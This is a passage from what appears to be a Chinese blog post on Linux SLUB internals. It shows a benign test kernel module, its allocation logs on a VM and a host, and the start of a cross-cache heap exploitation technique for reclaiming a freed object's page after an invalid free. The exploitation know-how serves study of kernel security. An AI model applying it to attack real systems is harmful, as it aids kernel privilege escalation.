<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/module.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/kernel.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/mm.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slab.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slub_def.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/sched.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_SIZE 256</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_NUM ((PAGE_SIZE/OBJ_SIZE) * 3)</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> {</span></span><br><span class="line"> <span class="keyword">char</span> data[OBJ_SIZE];</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">kmem_cache</span> *<span class="title">my_cachep</span>;</span></span><br><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> *<span class="title">ms</span>[<span class="title">OBJ_NUM</span>];</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> __init <span class="title">km_init</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"> <span class="keyword">int</span> i, cpu;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">kmem_cache_cpu</span> *<span class="title">c</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">pg</span>;</span></span><br><span class="line"></span><br><span class="line"> pr_info(<span class="string">"Hello\n"</span>);</span><br><span class="line"></span><br><span class="line"> my_cachep = kmem_cache_create(<span class="string">"my_struct"</span>,</span><br><span class="line"> <span class="keyword">sizeof</span>(struct my_struct), <span class="number">0</span>,</span><br><span class="line"> SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT,</span><br><span class="line"> <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> pr_info(<span class="string">"my_cachep: %px, %s\n"</span>, my_cachep, my_cachep->name);</span><br><span class="line"> pr_info(<span class="string">"my_cachep.size: %u\n"</span>, my_cachep-><span class="built_in">size</span>);</span><br><span class="line"> pr_info(<span class="string">"my_cachep.object_size: %u\n"</span>, kmem_cache_size(my_cachep));</span><br><span class="line"></span><br><span class="line"> cpu = get_cpu();</span><br><span class="line"> pr_info(<span class="string">"cpu: %d\n"</span>, cpu);</span><br><span class="line"></span><br><span class="line"> c = per_cpu_ptr(my_cachep->cpu_slab, cpu);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i<OBJ_NUM; i++){</span><br><span class="line"> ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> pg = virt_to_page(ms[i]);</span><br><span class="line"> pr_info(<span class="string">"[%02d] object: %px, page: %px(%px), %d\n"</span>, i, ms[i],</span><br><span class="line"> pg, page_address(pg),</span><br><span class="line"> (<span class="keyword">void</span> *)pg == (<span class="keyword">void</span> *)c->page);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> __exit <span class="title">km_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>( i = <span class="number">0</span>; i<OBJ_NUM; i++){</span><br><span class="line"> kmem_cache_free(my_cachep, ms[i]);</span><br><span class="line"> }</span><br><span class="line"> kmem_cache_destroy(my_cachep);</span><br><span class="line"> pr_info(<span class="string">"Bye\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">module_init(km_init);</span><br><span class="line">module_exit(km_exit);</span><br><span class="line"></span><br><span class="line">MODULE_LICENSE(<span class="string">"GPL"</span>);</span><br><span class="line">MODULE_AUTHOR(<span class="string">"X++D"</span>);</span><br><span class="line">MODULE_DESCRIPTION(<span class="string">"Kernel xxx Module."</span>);</span><br><span class="line">MODULE_VERSION(<span class="string">"0.1"</span>);</span><br></pre></td></tr></table></figure>
</li>
<li><p>VM result</p>
<p> 分配的 object 地址和 page 的关系非常清晰</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ insmod slab-tc.ko</span><br><span class="line">[ <span class="number">1184.983757</span>] Hello</span><br><span class="line">[ <span class="number">1184.984278</span>] my_cachep: ffff8880096ea000, my_struct</span><br><span class="line">[ <span class="number">1184.985568</span>] my_cachep.<span class="built_in">size</span>: <span class="number">256</span></span><br><span class="line">[ <span class="number">1184.986451</span>] my_cachep.object_size: <span class="number">256</span></span><br><span class="line">[ <span class="number">1184.987488</span>] cpu: <span class="number">0</span></span><br><span class="line">**[ <span class="number">1184.988945</span>] [<span class="number">00</span>] object: ffff888005c38000, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span>**</span><br><span class="line">[ <span class="number">1184.991189</span>] [<span class="number">01</span>] object: ffff888005c38100, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1184.993438</span>] [<span class="number">02</span>] object: ffff888005c38200, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1184.995688</span>] [<span class="number">03</span>] object: ffff888005c38300, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1184.998018</span>] [<span class="number">04</span>] object: ffff888005c38400, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.000234</span>] [<span class="number">05</span>] object: ffff888005c38500, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.002529</span>] [<span class="number">06</span>] object: ffff888005c38600, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.004702</span>] [<span class="number">07</span>] object: ffff888005c38700, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.006841</span>] [<span class="number">08</span>] object: ffff888005c38800, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.008919</span>] [<span class="number">09</span>] object: ffff888005c38900, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.010944</span>] [<span class="number">10</span>] object: ffff888005c38a00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.013021</span>] [<span class="number">11</span>] object: ffff888005c38b00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.014904</span>] [<span class="number">12</span>] object: ffff888005c38c00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.016926</span>] [<span class="number">13</span>] object: ffff888005c38d00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.018883</span>] [<span class="number">14</span>] object: ffff888005c38e00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span></span><br><span class="line">**[ <span class="number">1185.020761</span>] [<span class="number">15</span>] object: ffff888005c38f00, page: ffffea0000170e00(ffff888005c38000), <span class="number">1</span>**</span><br><span class="line">**[ <span class="number">1185.022735</span>] [<span class="number">16</span>] object: ffff88800953d000, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span>**</span><br><span class="line">[ <span class="number">1185.024679</span>] [<span class="number">17</span>] object: ffff88800953d100, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.026579</span>] [<span class="number">18</span>] object: ffff88800953d200, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.028528</span>] [<span class="number">19</span>] object: ffff88800953d300, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.030443</span>] [<span class="number">20</span>] object: ffff88800953d400, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.032372</span>] [<span class="number">21</span>] object: ffff88800953d500, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.034263</span>] [<span class="number">22</span>] object: ffff88800953d600, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.036116</span>] [<span class="number">23</span>] object: ffff88800953d700, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.038086</span>] [<span class="number">24</span>] object: ffff88800953d800, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.039929</span>] [<span class="number">25</span>] object: ffff88800953d900, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.041944</span>] [<span class="number">26</span>] object: ffff88800953da00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.043852</span>] [<span class="number">27</span>] object: ffff88800953db00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.045736</span>] [<span class="number">28</span>] object: ffff88800953dc00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.047678</span>] [<span class="number">29</span>] object: ffff88800953dd00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.049585</span>] [<span class="number">30</span>] object: ffff88800953de00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span></span><br><span class="line">**[ <span class="number">1185.051391</span>] [<span class="number">31</span>] object: ffff88800953df00, page: ffffea0000254f40(ffff88800953d000), <span class="number">1</span>**</span><br><span class="line">**[ <span class="number">1185.053206</span>] [<span class="number">32</span>] object: ffff888009543000, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span>**</span><br><span class="line">[ <span class="number">1185.055038</span>] [<span class="number">33</span>] object: ffff888009543100, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.056666</span>] [<span class="number">34</span>] object: ffff888009543200, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.058430</span>] [<span class="number">35</span>] object: ffff888009543300, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.060174</span>] [<span class="number">36</span>] object: ffff888009543400, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.061955</span>] [<span class="number">37</span>] object: ffff888009543500, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.063694</span>] [<span class="number">38</span>] object: ffff888009543600, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.065468</span>] [<span class="number">39</span>] object: ffff888009543700, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.067231</span>] [<span class="number">40</span>] object: ffff888009543800, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.068930</span>] [<span class="number">41</span>] object: ffff888009543900, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.070600</span>] [<span class="number">42</span>] object: ffff888009543a00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.072224</span>] [<span class="number">43</span>] object: ffff888009543b00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.073911</span>] [<span class="number">44</span>] object: ffff888009543c00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.075534</span>] [<span class="number">45</span>] object: ffff888009543d00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">[ <span class="number">1185.077211</span>] [<span class="number">46</span>] object: ffff888009543e00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span></span><br><span class="line">**[ <span class="number">1185.078887</span>] [<span class="number">47</span>] object: ffff888009543f00, page: ffffea00002550c0(ffff888009543000), <span class="number">1</span>**</span><br></pre></td></tr></table></figure>
<p> 有独立的 sysfs 目录</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ file /sys/kernel/slab/my_struct</span><br><span class="line">/sys/kernel/slab/my_struct: directory</span><br><span class="line"></span><br><span class="line">➜ ~ file /sys/kernel/slab/pool_workqueue</span><br><span class="line">/sys/kernel/slab/pool_workqueue: directory</span><br></pre></td></tr></table></figure>
</li>
<li><p>Host result</p>
<p> 分配的 obj 位于的 page 地址非常杂乱,<code>my_cachep</code> 的 <code>name</code> 也变成了 <code>pool_workqueue</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">435532.063645</span>] Hello</span><br><span class="line">[<span class="number">435532.063655</span>] my_cachep: ffff8faf40045900, pool_workqueue</span><br><span class="line">[<span class="number">435532.063658</span>] my_cachep.<span class="built_in">size</span>: <span class="number">256</span></span><br><span class="line">[<span class="number">435532.063659</span>] my_cachep.object_size: <span class="number">256</span></span><br><span class="line">[<span class="number">435532.063660</span>] cpu: <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063662</span>] [<span class="number">00</span>] object: ffff8fafb100b400, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063664</span>] [<span class="number">01</span>] object: ffff8fafb100a700, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063666</span>] [<span class="number">02</span>] object: ffff8fafb100ae00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063668</span>] [<span class="number">03</span>] object: ffff8fafb100b900, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063670</span>] [<span class="number">04</span>] object: ffff8fafb100be00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063672</span>] [<span class="number">05</span>] object: ffff8fafb100bf00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063674</span>] [<span class="number">06</span>] object: ffff8fafb100af00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063676</span>] [<span class="number">07</span>] object: ffff8fafb100ad00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063677</span>] [<span class="number">08</span>] object: ffff8fafb100bc00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063679</span>] [<span class="number">09</span>] object: ffff8fafb100a600, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063681</span>] [<span class="number">10</span>] object: ffff8fafb100a800, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063683</span>] [<span class="number">11</span>] object: ffff8fafb100a000, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063685</span>] [<span class="number">12</span>] object: ffff8fafb100ab00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063687</span>] [<span class="number">13</span>] object: ffff8fafb100b300, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063689</span>] [<span class="number">14</span>] object: ffff8fafb100a900, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063690</span>] [<span class="number">15</span>] object: ffff8fafb100b000, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063692</span>] [<span class="number">16</span>] object: ffff8fafb100a100, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063694</span>] [<span class="number">17</span>] object: ffff8fafb100b100, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063696</span>] [<span class="number">18</span>] object: ffff8fafb100b500, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063698</span>] [<span class="number">19</span>] object: ffff8fafb100bd00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063700</span>] [<span class="number">20</span>] object: ffff8fafb100ba00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063702</span>] [<span class="number">21</span>] object: ffff8fafb100b700, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063703</span>] [<span class="number">22</span>] object: ffff8fafb100a200, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063705</span>] [<span class="number">23</span>] object: ffff8fafb100b200, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063707</span>] [<span class="number">24</span>] object: ffff8fafb100bb00, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063709</span>] [<span class="number">25</span>] object: ffff8fafb100aa00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063711</span>] [<span class="number">26</span>] object: ffff8fafb100a500, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063713</span>] [<span class="number">27</span>] object: ffff8fafb100b600, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063714</span>] [<span class="number">28</span>] object: ffff8fafb100b800, page: ffffd50545c402c0(ffff8fafb100b000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063716</span>] [<span class="number">29</span>] object: ffff8fafb100a400, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063718</span>] [<span class="number">30</span>] object: ffff8fafb100ac00, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063720</span>] [<span class="number">31</span>] object: ffff8fafb100a300, page: ffffd50545c40280(ffff8fafb100a000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063724</span>] [<span class="number">32</span>] object: ffff8faf488fec00, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063726</span>] [<span class="number">33</span>] object: ffff8faf488fe400, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063728</span>] [<span class="number">34</span>] object: ffff8faf488ff800, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063730</span>] [<span class="number">35</span>] object: ffff8faf488ff600, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063732</span>] [<span class="number">36</span>] object: ffff8faf488fe500, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063734</span>] [<span class="number">37</span>] object: ffff8faf488fea00, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063736</span>] [<span class="number">38</span>] object: ffff8faf488ffb00, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063737</span>] [<span class="number">39</span>] object: ffff8faf488ff200, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063739</span>] [<span class="number">40</span>] object: ffff8faf488fe200, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063741</span>] [<span class="number">41</span>] object: ffff8faf488ff700, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063743</span>] [<span class="number">42</span>] object: ffff8faf488ffa00, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063745</span>] [<span class="number">43</span>] object: ffff8faf488ff400, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063747</span>] [<span class="number">44</span>] object: ffff8faf488fe700, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063749</span>] [<span class="number">45</span>] object: ffff8faf488fee00, page: ffffd50544223f80(ffff8faf488fe000), <span class="number">1</span></span><br><span class="line">[<span class="number">435532.063750</span>] [<span class="number">46</span>] object: ffff8faf488ff900, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.063752</span>] [<span class="number">47</span>] object: ffff8faf488ffe00, page: ffffd50544223fc0(ffff8faf488ff000), <span class="number">0</span></span><br><span class="line">[<span class="number">435532.065672</span>] Bye</span><br></pre></td></tr></table></figure>
<p> sysfs 目录也是和 <code>pool_workqueue</code> 共用的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─[$] file /sys/kernel/slab/my_struct </span><br><span class="line">/sys/kernel/slab/my_struct: symbolic link to :<span class="number">0000256</span></span><br><span class="line"></span><br><span class="line">└─[$] file /sys/kernel/slab/pool_workqueue </span><br><span class="line">/sys/kernel/slab/pool_workqueue: symbolic link to :<span class="number">0000256</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<h2 id="Part-3"><a href="#Part-3" class="headerlink" title="Part. 3"></a>Part. 3</h2><p>根据前两个部分知道,开启 <code>CONFIG_SLAB_MERGE_DEFAULT</code> 配置后,不同类型的 <code>kmem_cache</code> 的内存完全隔离.</p>
<p>这种情况下,想要占据被释放的 slab object 内存(比如一个 <code>struct file</code>) 只能通过申请相同的 slab object,</p>
<p>而像 <code>struct file</code> 这样的内存,用户态可以操纵的内容非常有限,</p>
<p>解决办法是: 占据目标 object (e.g. <code>struct file</code>) 所在的整个 page,在 object invalid free 之后 free 掉同页面其他 object,再满足<a href="https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/#how-to-free-a-page" target="_blank" rel="noopener">一系列条件</a> 就可以让整个 page 被 buddy system 回收,并被重新申请</p>
<hr>
<p><strong>条件一:</strong></p>
<p>目标 object 所在的 page 不是 <code>s->cpu_slab->page</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> __always_inline <span class="keyword">void</span> <span class="title">do_slab_free</span><span class="params">(struct kmem_cache *s,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct page *page, <span class="keyword">void</span> *head, <span class="keyword">void</span> *tail,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">int</span> cnt, <span class="keyword">unsigned</span> <span class="keyword">long</span> addr)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">...</span><br><span class="line"> c = raw_cpu_ptr(s->cpu_slab);</span><br><span class="line">...</span><br><span class="line"> **<span class="keyword">if</span> (likely(page == c->page)) {**</span><br><span class="line"> ...</span><br><span class="line"> } <span class="keyword">else</span></span><br><span class="line"> __slab_free(s, page, head, tail_obj, cnt, addr);</span><br><span class="line"> ...</span><br></pre></td></tr></table></figure>
<p><strong>条件二:</strong></p>
<p>object 所在 page 满足 <code>page->pobjects > (s)->cpu_partial</code></p>
